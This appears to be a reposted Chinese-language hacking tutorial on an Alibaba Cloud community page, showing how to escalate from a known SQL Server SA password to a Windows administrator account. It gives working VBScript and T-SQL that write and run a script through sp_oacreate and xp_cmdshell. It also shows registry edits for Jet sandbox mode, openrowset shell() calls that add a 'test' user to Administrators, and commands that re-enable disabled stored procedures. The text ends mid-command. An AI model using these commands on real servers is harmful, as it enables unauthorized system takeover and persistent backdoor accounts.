Microsoft SQL Server SA許可權最新入侵方法

來源:互聯網
上載者:User

   在獲得SA密碼後,往往因為伺服器管理者或”前人”將net.exe和net1.exe被限制使用,無法添加管理員帳號。我們知道VBS在活動目錄(ADSI)部分有一個winnt對象,用來管理本地資源,利用它可以不依靠CMD等命令就能添加一個管理員,具體代碼如下:

  set wsnetwork=CreateObject("WSCRIPT.netWORK")

  os="WinNT://"&wsnetwork.ComputerName

  Set ob=GetObject(os) '得到adsi介面,綁定

  Set oe=GetObject(os&"/Administrators,group") '屬性,admin組

  Set od=ob.Create("user","test") '建立使用者

  od.SetPassword "1234" '設定密碼

  od.SetInfo '儲存

  Set of=GetObject(os&"/test",user) '得到使用者

  oe.add os&"/test"

  將上面的代碼儲存為1.vbs,然後執行,命令為“cscript 1.vbs”,這樣就會在系統添加一個系統名為test,密碼為1234的使用者。具體在查詢分析器執行的代碼如下:

  declare @o int, @f int, @t int, @ret int

  exec sp_oacreate 'scripting.filesystemobject', @o out

  exec sp_oamethod @o, 'createtextfile', @f out, 'c:/1.vbs', 1

  exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject

  ("WSCRIPT.NETWORK")'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.

  ComputerName'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject

  (os&"/Administrators,group")'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create

  ("user","test")'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject

  (os&"/test",user) '

  exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

  執行完上面的語句,再執行下面這行代碼,這行代碼一定單獨執行,不要與上面的放在一起執行,否則會提示“c:/1.vbs正被另一個程式運行”而無法成功添加使用者:

  exec master..xp_cmdshell 'cscript c:/1.vbs'

  如果系統使用者沒有添加成功,有可能是因為系統使用者的密碼1234的太簡單,不符合伺服器的複雜密碼原則,可以考慮設定的複雜些,然後再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式為:

  exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")

  >>1.vbs'

  不過,不知道為什麼所有帶“&”字元的命令列都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。

  使用jet沙盤模式,可以解決XP_cmdshell等預存程序和相關動態連結程式庫帶來的煩惱。出於安全原因,系統預設情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:

  Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0

  /Engines','SandBoxMode','REG_DWORD',1

  然後執行沙盤命令,在系統添加一個使用者名稱為test,密碼為1234的使用者:

  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/Windows

  /system32/ias/ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/Windows

  /system32/ias/ias.mdb','select shell("cmd.exe /c net localgroup

  administrators test /add")')

  不同的作業系統,路徑也不一樣,需要根據情況做修改:

  NT/2K: c:/winnt/system32/

  XP/2003: c:/windows/system32/

  另外Microsoft SQL Server2005在預設情況下,一些預存程序是關閉著的,需要命令開啟:

  開啟XP_cmdshell:

  EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure

  'xp_cmdshell', 1;RECONFIGURE;

  開啟'OPENROWSET':

  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure

  'Ad Hoc Distributed Queries',1;RECONFIGURE;

  開啟'sp_oacreate':

  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp

  

 

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.